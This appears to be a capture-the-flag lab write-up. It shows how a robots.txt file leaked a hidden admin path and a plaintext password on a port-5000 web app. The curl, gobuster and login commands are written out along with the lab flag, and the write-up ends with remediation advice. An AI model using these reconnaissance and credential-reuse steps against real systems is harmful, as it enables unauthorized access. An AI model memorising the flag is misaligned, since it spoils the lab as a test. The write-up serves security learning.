robots.txt secret vault path and leaked admin password
Foundations web engagement: robots.txt disclosed /cupids_secret_vault/* and password cupid_arrow_2026!!!; admin login under that path returned the engagement artifact.
- Case files
- robots.txt secret vault path and leaked admin password
Port 5000 app; robots.txt leaked Disallow path and a plaintext password; admin:cupid_arrow_2026!!! unlocked the vault.
Fetched robots.txt; used leaked password on vault admin panel.
Engagement summary
Port 5000 app; robots.txt leaked Disallow path and a plaintext password; admin:cupid_arrow_2026!!! unlocked the vault.
HIDDEN DEEP INTO MY HEART served a minimal site on TCP 5000. Directory enum surfaced robots.txt containing Disallow: /cupids_secret_vault/* and the string cupid_arrow_2026!!!. Enumerating under that prefix found an administrator login. Credentials admin / cupid_arrow_2026!!! authenticated and returned the protected content.
Business impact
robots.txt is not access control — it is a map for attackers. Never place passwords or admin paths in robots.txt. Protect admin with MFA and network restrictions; remove secrets from static discovery files.
robots.txt to admin login
Fetched robots.txt; used leaked password on vault admin panel.
OPERATOR · ENUM
savvy@lab:~$ curl -s http://10.10.10.50:5000/robots.txt
Disallow: /cupids_secret_vault/*
cupid_arrow_2026!!!
savvy@lab:~$ gobuster dir -u http://10.10.10.50:5000/cupids_secret_vault/ -w /usr/share/wordlists/dirb/common.txt
/admin (admin login)
savvy@lab:~$ curl -s -X POST http://10.10.10.50:5000/cupids_secret_vault/admin -d 'username=admin&password=cupid_arrow_2026!!!'
THM{l0v3_is_in_th3_r0b0ts_txt}
Remediation
Strip secrets from robots.txt; rate-limit and MFA admin; prefer not advertising admin paths publicly.